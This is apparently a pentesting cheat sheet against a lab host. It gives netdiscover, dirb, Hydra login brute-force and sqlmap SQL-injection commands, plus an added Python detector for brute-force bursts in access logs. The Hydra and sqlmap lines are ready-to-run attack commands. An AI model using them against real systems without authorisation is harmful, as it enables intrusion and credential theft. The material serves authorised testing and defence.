# Pentesting
Pentesting is an authorized simulated attack on a computer system, performed to evaluate the security of the system.
# Links
- A Penetration Tester’s Guide to Postgres
- Code injection – a simple PHP virus carried in a JPEG image
- Injecting Malicious PHP In To An Image File : Injection And Execution
# Useful Commands
# Scanning a range of IP addresses
```
root@kali:~# netdiscover -i eth2 -r 192.168.0.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.0.1     f8:1a:67:5a:fe:24      1      60  TP-LINK TECHNOLOGIES CO.,LTD
 192.168.0.100   a8:60:b6:3a:56:ce      2     120  Apple, Inc.
 192.168.0.101   e0:3f:49:14:a9:0d      1      60  Unknown vendor
```
# Useful Tools
# DIRB
Brute-forces directories and files on a web server by requesting each entry from a wordlist.
# Usage
```bash
dirb http://192.168.0.104/ /usr/share/wordlists/dirb/big.txt
```
# Resources
- http://tools.kali.org/web-applications/dirb
- https://github.com/seifreed/dirb
# gobuster
Directory/file & DNS busting tool written in Go.
# Resources
# Hydra
Brute-forces username and password login forms.
# Usage
```bash
hydra 192.168.0.104 http-post-form '/imfadministrator/index.php:user=^USER^&pass=^PASS^:Invalid password' -L /root/usernames.txt -P /usr/share/wordlists/metasploit/password.lst -vV -t 10 -w 30 -o hydra-http-post-attack.txt
```
# Resources
- http://insidetrust.blogspot.ca/2011/08/using-hydra-to-dictionary-attack-web.html
- http://tools.kali.org/password-attacks/hydra/
- https://www.blackmoreops.com/2015/12/23/crack-passwords-in-kali-linux-with-hydra/
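Seen from the defending side, the Hydra run above appears in the web server's access log as a burst of POSTs to the login form from one client. The following is an added example, not part of the original notes, that flags such bursts; the combined log format, the threshold, the window, the client addresses and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

# Assumed Apache/Nginx "combined" access-log layout.
LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
LOGIN_PATH = "/imfadministrator/index.php"  # login form path from the Hydra usage
THRESHOLD = 20                   # assumed: login POSTs tolerated per client per window
WINDOW = timedelta(seconds=60)   # assumed sliding-window length


def find_bruteforce(lines, threshold=THRESHOLD, window=WINDOW):
    """Return {client_ip: peak POST count} for clients that exceed `threshold`
    login POSTs inside any sliding `window`. Lines must be in time order."""
    recent = defaultdict(deque)  # ip -> timestamps still inside the window
    peaks = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue  # unparsable line or not a form submission
        if m["path"].split("?")[0] != LOGIN_PATH:
            continue
        ts = datetime.strptime(m["ts"], TS_FMT)
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:  # drop attempts that fell out of the window
            q.popleft()
        if len(q) > threshold:
            peaks[m["ip"]] = max(peaks.get(m["ip"], 0), len(q))
    return peaks


def sample_log():
    """Constructed sample: one client sends 40 login POSTs in 40 s,
    another logs in 3 times over a minute."""
    base = datetime(2016, 10, 1, 12, 0, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "POST ' + LOGIN_PATH + ' HTTP/1.1" 200 312 "-" "-"'
    stamp = lambda secs: (base + timedelta(seconds=secs)).strftime(TS_FMT)
    noisy = [fmt.format(ip="192.168.0.50", ts=stamp(i)) for i in range(40)]
    normal = [fmt.format(ip="192.168.0.60", ts=stamp(30 * i)) for i in range(3)]
    return noisy + normal


if __name__ == "__main__":
    for ip, peak in find_bruteforce(sample_log()).items():
        print(f"{ip}: {peak} login POSTs within {WINDOW.seconds}s")
```

Failed logins on this form return the "Invalid password" page with a normal status code, so the check counts POSTs rather than error responses.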
# sqlmap
Automates detecting and exploiting SQL injection flaws.
# Usage
When the target page sits behind a PHPSESSID-authenticated session, pass the session cookie:

```bash
sqlmap -u "http://192.168.0.104/imfadministrator/cms.php?pagename=upload" --banner --cookie="PHPSESSID=m0i2uapvsqlklug2tpe2a8cis2; security=low" -f
```